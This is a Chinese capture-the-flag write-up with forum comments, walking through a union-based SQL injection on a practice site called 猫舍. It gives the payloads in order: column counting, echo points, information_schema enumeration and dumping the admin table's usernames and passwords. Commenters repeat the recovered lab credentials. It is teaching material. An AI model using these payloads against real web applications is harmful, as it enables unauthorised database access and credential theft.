猫舍 writeup
第一步,判断是否存在sql注入漏洞
构造 ?id=1 and 1=1 ,回车
页面返回正常
构造 ?id=1 and 1=2 ,回车
页面不正常,初步判断这里 可能 存在一个注入漏洞
第二步:判断字段数
构造 ?id=1 and 1=1 order by 1 回车
页面正常
构造 ?id=1 and 1=1 order by 2 回车
页面正常
构造 ?id=1 and 1=1 order by 3 回车
页面返回 错误,判断字段数为 2
第三步:判断回显点
构造 ?id=1 and 1=2 union select 1,2 回车
页面出现了 2 ,说明我们可以在数字 2 处显示我们想要的内容
第四步:查询相关内容
查询当前数据库名
构造 ?id=1 and 1=2 union select 1,database() 回车
查询当前数据库版本
构造 ?id=1 and 1=2 union select 1,version() 回车
查询当前数据库 表名
构造 ?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_schema=database() limit 0,1 回车
绝大数情况下,管理员的账号密码都在admin表里
查询字段名
构造 ?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 0,1 回车
构造 ?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 1,1 回车
构造 ?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 2,1 回车
查出 admin 表里 有 id username password 三个字段
查询字段内容
构造 ?id=1 and 1=2 union select 1,username from admin limit 0,1 回车
构造 ?id=1 and 1=2 union select 1,password from admin limit 1,1 回车
limit 1,1 没有回显,说明只有一个用户
构造 ?id=1 and 1=2 union select 1,password from admin limit 0,1 回车
得到管理员账号和密码
注:之前为了防止某些同学不思考直接复制内容,所以故意写错几个单词,没想到给各位同学带来困扰,深表歉意。
打赏我,让我更有动力~
登录后才可发表内容
返回首页
CTF&WP专版
adm1n
发表于 2019-1-30
不错不错,
评论列表
加载数据中...
tanhua
发表于 2019-4-2
教材假的
评论列表
加载数据中...
luok
发表于 2019-4-14
单词错了,红色标记 where 条件
评论列表
加载数据中...
ahrui
发表于 2019-4-16
构造1=2时页面正常像什么都没发生是为什么
评论列表
加载数据中...
掌控安全–东
发表于 2019-5-24
评论列表
加载数据中...
ljxzy123
发表于 2019-6-12
不错不错,学习了
评论列表
加载数据中...
1739770884
发表于 2019-7-31
大佬们 有个疑问
为什么order by的时候判断出2个字段
结果下面的操作是3个字段?
是两张表吗?
评论列表
加载数据中...
jk
发表于 2019-11-10
flag 不是hellohack ?
评论列表
加载数据中...
eagle006
发表于 2019-12-13
我按照上面的操作还发现还有一个用户:
密码是:
不知道对不对,请老师指正
评论列表
加载数据中...
心怀天下
发表于 2020-1-7
评论列表
加载数据中...
tmxu
发表于 2020-2-7
评论列表
加载数据中...
free_travel
发表于 2020-3-7
评论列表
加载数据中...
没学会不改名
发表于 2020-3-13
单词错了我们这些英语不好得怎么办
评论列表
加载数据中...
hack_2_something
发表于 2020-3-31
只有两个显示位,为啥,能在页面显示出后台有4个数据库啊.
admin、dirs、news、xss。
还有一个问题,就是为啥在sql注入的时候,为什么在这个实验中,不需要加入单引号,来注释掉原来数据库中存在的单引号呢
评论列表
加载数据中...
kingzzp
发表于 2020-5-14
谷歌浏览器不能用吗?自动变了
评论列表
加载数据中...
supejkj
发表于 2020-6-1
一直输入的是zkaqbanban 不对 然后输入用户名就对了0.0
评论列表
加载数据中...
kakas1992
发表于 2020-6-12
请问哪位大神有oracle靶场源码啊。小弟想自己线下练习
评论列表
加载数据中...
baolongfengu
发表于 2020-7-7
没搞懂提交flag是啥意思,把数据库逛完了都没看到flag这个词,原来就是提交密码啊。
数据库maoshe下查到了4张表:admin,dirs,news,xss
database[maoshe].table_name[admin].column_name[Id,username,password]:
1,admin,hellohack
2,ppt领取微信,zkaqbanban
database[maoshe].table_name[dirs].column_name[paths]:
无内容
database[maoshe].table_name[news].column_name[id,content]:
id 1 为:正文内容
id 2 为:“工程师偷懒可还行”
id 3 为:扫描二维码领取东西
database[maoshe].table_name[xss].column_name[id,user,pass]:
无内容
其中用了concat()和group_concat()查起来方便多了,不用一个一个的改查询对象,用法也很容易搜索到。
评论列表
加载数据中...
小生牛牛
发表于 2020-7-8
提交不了啊,hellohack
评论列表
加载数据中...
任永刚
发表于 2020-7-30
admin
zkaqbanban
hellohack
评论列表
加载数据中...